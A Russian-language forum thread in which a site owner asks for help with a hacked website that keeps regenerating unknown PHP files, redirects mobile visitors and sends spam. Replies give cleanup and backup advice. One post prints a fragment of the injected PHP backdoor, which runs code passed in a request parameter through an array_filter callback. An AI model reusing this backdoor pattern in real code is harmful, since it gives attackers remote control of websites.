Прошу специалистов подсказать, как обнаружить и закрыть дыры в сайте .
Подменяется или появляются такие страницы, как 404_error.php, components/price/user.php, includes/jquery/autogrow/functions.php
Шаблон Adattive, v1.10.3
Ну и раз сломали уже, значит надо пароли от доступа к хостингу поменять (ftp, ssh), а то можно ждать повторения.
Насколько я понял, было перенаправление на какую то страницу, при просмотре сайта на мобильных устройствах.
Также с сайта идет рассылка каких то писем, я как то порылся в одной из найденных залитых, чужих страниц… нашел в оконцовке сайт куда идет перенаправление — на сайт каких то курсов в Москве..
Пока поменяю пароли… ума не приложу, как закрыть доступ.
; $p = array($_REQUEST['x']); $pf = array_filter($p, $f);exit; ?> <div class="custom-icon-uploader" id="custom_icon_uploader"> <span class="spinner" style="display:none"></span> <button class="upload button-secondary" id="custom_icon_upload_button"><?php _e( 'Upload Icon', 'wptouch-pro' ); ?></button> <div class="progress progress-striped progress-success" style="display: none;" title="<?php _e( 'Upload Complete!', 'wptouch-pro' ); ?>" rel="popover" data-placement="right"> <div class="bar" style="width: 20%;"></div> </div> <br class="clearfix" /> <span class="upload-desc"><?php _e( 'Ready to upload', 'wptouch-pro' ); ?>…</span> <div id="custom_icon_uploader_spot" style="display: none;"></div> </div>
Уважаемый stealthdebuger
Александр, вы плохо понимаете суть данной уязвимости, иначе бы не выдвинули такое предположение.
все возможно, ну сами подумайте если получить полный доступ к серверу на котором хранятся сайты, или хостер использует старое ПО в котором есть лазейки и возможно просмотра не только своего сайта, а и других каким то образом, то можно внедрять свой зловредный код в другие детища. Я просто стараюсь рассмотреть все возможные явления в данной ситуации. Плюс если уязвимость дает большие возможности и получить полный контроль над машиной(выполняя любые команды), почему вы считаете, что такая вроде бы абсурдная идея не имеет право на существование?
я советую вам чаще делать бекапы, желательно отдельные еще потом периодически раз в неделю или хотя бы месяц, почистить сайт от шелов и т.д.
подыскать достойного хостера для своего сайтика и не забывать главное про безопасность на своём компьютере — поставить хотя бы тот же NOD32 от комании ESET(версию Endpoint Security 5.0.2229.1, она лучше корпоративная и firewall есть!)
а так еще проверьте AI-Bolit'ом скриптом выше в самом первом комментарии про него написал ^^
Бекапы серверными средствами делаю.
Так если всю базу целиком, и если есть доступ к ssh, то удобней и быстрее так:кто какие использует срипты(вещи) для бекапа базы данных, ну кроме phpmyadmin? Я например очень люблю Sypex Dumper 2
mysqldump -uUser -p database > database.sql
Подменяется или появляются такие страницы, как 404_error.php, components/price/user.php, includes/jquery/autogrow/functions.php
Капец, эти файлы после удаления опять появились, что делать ???